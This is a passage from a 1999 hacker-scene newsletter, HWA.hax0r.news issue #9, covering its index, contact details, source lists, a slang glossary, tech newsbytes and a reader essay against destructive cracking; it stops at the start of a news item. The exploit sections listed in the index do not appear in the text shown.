[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 9 Volume 1 1999 March 13th 99 ========================================================================== Are you running WindowsNT and still under the illusion that it is secure? ``A couple of freelance writers are working on a story for us about security auditing and protection. As part of their "research," they decided to see if they could hack into one of our lab networks. It took them only a few hours to successfully break into our Windows NT boxes. And from there, they learned the configuration of our lab networks, the server names and functions, the operating systems we run and most of the passwords on the key accounts on our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a good many of our routers and switches.'' - From NetworkWeek, Story in section 10.0 Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #9 =-----------------------------------------------------------------------= "I'm doing the BEST I can so don't give me any SHIT" - Seen on a button worn by `Ed'.. ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** ******************************************************************* =-------------------------------------------------------------------------= Issue #9 Empirical knowledge is power =--------------------------------------------------------------------------= inet.d THIS b1lly the llammah ________ ------- ___________________________________________________________ |\____\_/[ INDEX ]__________________________________________________________/| | | || | | Key Content || \|_________________________________________________________________________/ 00.0 .. COPYRIGHTS 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC 00.2 .. SOURCES 00.3 .. THIS IS WHO WE ARE 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'? 00.5 .. THE HWA_FAQ V1.0 \__________________________________________________________________________/ 01.0 .. Greets 01.1 .. Last minute stuff, rumours, newsbytes 01.2 .. Mailbag 02.0 .. From the editor 02.1 .. Demoniz trashcans his webboard 03.0 .. AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse 03.1 .. The FPSC-IRCD.txt advisory. 04.0 .. Pentagon under attack (again) 04.1 .. Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange. 04.2 .. New Backdoor found: Default passwords in Bay networks switches 04.3 .. ISAPI exploit code 04.4 .. Winfreez.c new exploit code for win9x and NT 04.5 .. Unknown Zone: Windows intra/inter net zone difficulties 04.6 .. Sniffing out MS Security glitch 05.0 .. Linux TCP flaw exploit code for Linux 2.0.35 and older. (includes Solaris version) 06.0 .. Solaris 2.6 x86 /usr/bin/write buffer overflow exploit 07.0 .. New Computer Technology Makes Hacking a Snap - Washington Post 08.0 .. Korean "Superhacker" a national resource... 09.0 .. The l0pht and NFR team up to produce top flight IDS 10.0 .. A good example of how 'Secure' NT really is 11.0 .. CON: The Black Hat Briefings Security Conference 12.0 .. CON: CQRE [Secure] Congress and Exhibition 13.0 .. CON: can't afford $2k? check out Canc0n99 security Conference 14.0 .. CON: Countering cyberterrorism AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. H.W .. Hacked Websites A.0 .. APPENDICES A.1 .. PHACVW linx and references ____________________________________________________________________________ |\__________________________________________________________________________/| | | || | | || \|_________________________________________________________________________|/ @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? - unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!* News (New site unconfirmed).......http://cnewz98.hypermart.net/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) BEST-OF-SECURITY Subscription Info. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _/_/_/ _/_/ _/_/_/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/_/ _/_/_/ Best Of Security "echo subscribe|mail best-of-security-request@suburbia.net" or "echo subscribe|mail best-of-security-request-d@suburbia.net" (weekly digest) For those of you that just don't get the above, try sending a message to best-of-security-request@suburbia.net with a subject and body of subscribe and you will get added to the list (maybe, if the admin likes your email). Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ "If all it takes is a million monkeys banging on keyboards then how come AOL hasn't turned out any Shakespeare yet??" - Anon. Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "When i'm 21 i'm going to change my name to 'Anonymous' and claim royalties for all the editorials written and attributed to my name." - Anonymous Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * tsal * spikeman * YOU. * #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ BORED? You may be interested in this... http://www.patents.ibm.com/details?patent_number=5501650 if that isn't quite your erh speed, then you can always check out http://www.hamsterdance.com/ for a laugh I enjoyed it ...the graphics are most amusing. ++ SO YOU SAY YOUR MACHINE CRASHES EVERY MONTH OR SO? Contributed by FProphet source: Betanews.com And you thought it was just you. Betanews.com (www.betanews.com) reports that Microsoft has acknowledged a new bug discovered in Windows that locksa machine after 49.7 days of consecutive usage. A fix is available now, and is expected to appear in the forthcoming Windows 98 service release update, currently expected to be released in April. Microsoft's Personal Support Center has details. ++ INTEL PENTIUM III CHIP SERIAL NUMBERS CAN BE RETRIEVED BY ANYONE Mar 11th Contributed by Ed Intel released a program that allows the user to turn off the serial number of their new Pentium III chip, but Zero-Knowledge Systems claims it has developed an exploit which will retrieve the serial number wether the feature is turned on or off. I don't have one of these chips to test this out on so can't confirm or deny this report. ++ BANK PLAN FOES LINE UP http://www.wired.com/news/news/email/explode-infobeat/politics/story/18271.html Opponents of "Know Your Customer," a controversial plan by the government to monitor individuals' banking activities, will make their case on Capitol Hill. By Declan McCullagh. ++ DELL TO BUY BOATLOAD FROM IBM http://www.wired.com/news/news/email/explode-infobeat/business/story/18266.html Dell will buy about US$16 billion of chips, drives, and monitors from IBM during the next seven years. It's a nice boost to both companies. ++ CANADIAN TELECOM BEHEMOTH BORN http://www.wired.com/news/news/email/explode-infobeat/business/story/18269.html ++ AT&T Canada buys regional phone firm Metronet communications in US$4.6 billion deal. ++ EUROPEAN TELECOMS: BUY, BUY, BUY http://www.wired.com/news/news/email/explode-infobeat/business/story/18268.html France's Alcatel agrees to buy another California Internet company for US$350 million. And Germany's Seimens is expected to spend $US1.7 billion on US data-networking firms. ++ IT'S A LINUXWORLD AFTER ALL http://www.wired.com/news/news/email/explode-infobeat/technology/story/18261.html This week's conference is turning a tightknit community into an international phenomenon. Not all of the new industry stars are ready for the spotlight. Polly Sprenger reports from San Jose, California. ++ LINUX GETS OPEN-SOURCE GUI http://www.wired.com/news/news/email/explode-infobeat/technology/story/18265.html Thanks to an interface lift, Linux is ready to star on the desktop. GNOME marries components from familiar windowing environments and adds a few things of its own. Leander Kahney reports from San Jose, California. ++ NIPPING AT THE HEELS OF MP3 http://www.wired.com/news/news/email/explode-infobeat/technology/story/18253.html When high tech does battle on the Net, it's not always the best tech that wins. This is the lesson that a smaller, faster digital music format is learning in the face of MP3. By Christopher Jones. ++ TURNING DATA INTO DOLLARS http://www.wired.com/news/news/email/explode-infobeat/business/story/18254.html PeopleSoft stores information on about 30 million employees worldwide. Now the company is looking to generate e-business from its data banks, a plan that's raising eyebrows. By Joanna Glasner. ++ FROM COMDEX TO VENICE http://www.wired.com/news/news/email/explode-infobeat/culture/story/18258.html The creator of one of the world's biggest computer-trade shows builds the world's most high-tech hotel. Vince Beiser reports from Las Vegas. ++ NO TIME FOR PAIN http://www.wired.com/news/news/email/explode-infobeat/technology/story/18255.html A new therapy using electric current reduces chronic back pain, according to a study in the Journal of the American Medical Association. By Kristen Philipkoski. ++ MONICA'S BIO, BYTE BY BYTE http://www.wired.com/news/news/email/explode-infobeat/culture/story/18257.html Monica's Story, the Lewinsky memoir hitting bookstores on Thursday, will be the first book published simultaneously in e-book and paper form. By Steve Silberman. ++ BIG INSIDER SALES AT YAHOO http://www.wired.com/news/news/email/explode-infobeat/business/story/18251.html Executives sold close to a million shares in February. Analysts say this could be a red flag. By Jennifer Sullivan. ++ SENATE HEARS Y2K LIABILITY ACT http://www.wired.com/news/news/email/explode-infobeat/politics/story/18259.html Two senators introduce the latest legislation to head off a raft of Year 2000 lawsuits arising from failed computer systems. By Heidi Kriz. ++ BRITS ON NET: JOLLY GOOD http://www.wired.com/news/news/email/explode-infobeat/technology/story/18260.html Ten thousand new Britons log on each day, a new poll reveals. German newbies nip close at their their heels, but France has a ways to go. ++ KING FOR THE DOMAINS IN SIGHT http://www.wired.com/news/news/email/explode-infobeat/politics/story/18245.html The Internet Corporation for Assigned Names and Numbers finalizes proposals that will lay down the law on .com -- as well as .biz, .xxx, and other future top-level domains. By Chris Oakes. ++ GREENSPAN: BE WARY OF NET STOCKS (BUS. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/business/story/18250.html Older investors looking to retire should stay away from Internet stocks, the Federal Reserve chairman tells Congress. ++ CLINTON TABS PRIVACY POINT MAN (POL. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/politics/story/18249.html An Ohio State law professor will represent the administration's views concerning online privacy, an issue which gains a little more momentum every day. By Declan McCullagh and James Glave. ++ MUSIC INDUSTRY PLANS DVD AUDIO http://www.wired.com/news/news/email/explode-infobeat/technology/story/18247.html Record companies and technology companies agree on a copy-protection framework for the successor to CDs. DVD Audio is finally ready for consumers. By Christopher Jones. ++ DELL MORPHS INTO A RETAILER http://www.wired.com/news/news/email/explode-infobeat/business/story/18242.html The world's biggest direct seller of PCs hopes to become a big online seller of consumer electronics too. Wednesday, it launched its own online superstore. ++ LINUX, MEET OPERA http://www.wired.com/news/news/email/explode-infobeat/technology/story/18241.html Fans of Linux and Opera, which have both built support by taking on the bigwigs, can now run the underdog browser on the underdog OS. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG ~~~~~~~ Lots of mail, not much for sharing here though ... keep the letters coming! but don't forget to include something I can print too... ;) . . . . . . . // Written by NUL (If you don't know, don't ask) // http://come.to/hexx (UnderConstruction) // jeanclaude@canada.com // 99/03/11 #include To start this off I would like to make one thing abundantly clear: I do not consider myself a hacker. I'm more interested in programing than anything else. Sure, I've toiled a bit, but I cannot be considered as one of the El33t. The reason for which I am writing this little article is to try to place a bit of clairity on the reasons for hacking / cracking (or at least trying to make sence of them). /* */ Hacking, the original motto was to do no damage, but as time went by and people develloped new skills, they decided that the original motto no longer applied to them. Thus the cracker was born. Hacking and Cracking are two different entities. You can not be both at the same time. You are either one or the other. (For those of you who consider youselves as hackers or crackers but use other peoples' scirpts to hack/crack, you are neither. Anybody can point and click their way along or run a programe which does all the work for you, it doesn't require any talent.) There are a few things that I find pointless in what the cracker community is doing: First off: What the hell is the point of saying a server's security is shit if you don't help the server fix it??? What? Hack into it a second time? (I know there are a few groups out there who actually do help the servers they crack. This part doesn't concern you.) Second: Why the hell do people think that they are Eleet when they use a script to determine what systems are vulnerable? And exploit that vulnerability. Just because you know one or two tricks doesn't make you anything. Third: & what the hell is the point of writing in Eleet text? It's all fine and dandy if you can't spell, but please, half the time you sound like you never got a high school education! Power can only corrupt. Crackers who devellope thier skills eventually loose control (though this isn't true for everybody) they can't help but feel destructive. Though there are different levels of destructiveness (as I see it): A: Destroying all information, just for the heck of it. B: Destributing information / programs to ruin a business. C: Defacing information. D: Replacing information, but leaving a back-up copy. E: Destroying all information, for good purposes. The last one (E) does fall into the category of cracking because it still is vandalisment of information even though it's for a good purpose (Cracking the KKK server(s) and destroying everything would be considered a class E). Ok, ok I know... This did kindof turn out to be a bit differently then what it was supposed to be, but still I think I did manage to get a small message accross... // EOF Props to; Parse, OTH, kokey, Pyra, Qubic, siko, spikeman and spacerogue and tattooman among others .. @HWA 02.0 From the editor.#9 ~~~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Blech, fuck snow ... and overclocked chips that can't take the *heat even with oversize fans and sinks duct taped to them ... ;) * *Moving right along, thanks for the continued support everyone and tty next time... */ printf ("EoF.\n"); } w00t w00t w00t! ... w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk. 1. A transcursion or transcendance into joy from an otherwise inert state 2. Something Cruciphux can't go a day without typing on Efnet Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 02.1 Demoniz trashcans his webboard ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Less than a month after the very cool bikkel security site closed down demoniz has pulled the plug on his webboard which he left running after closing down the main news site. Citing DoS attacks and spam as being the #1 reasons, it turns my stomach just to think of this...pulled from help net security's site. http://net-security.org/ WEBBOARDS by deepcase, Monday 8th Mar 1999 on 1:34 pm CET Bikkel's Webboard which was first a project for a private webboard with user login and password is finally down. In an email i recieved from demoniz he said "The board is offline for good. I gave my best shot, but it didn't work. The ingoing Denial of 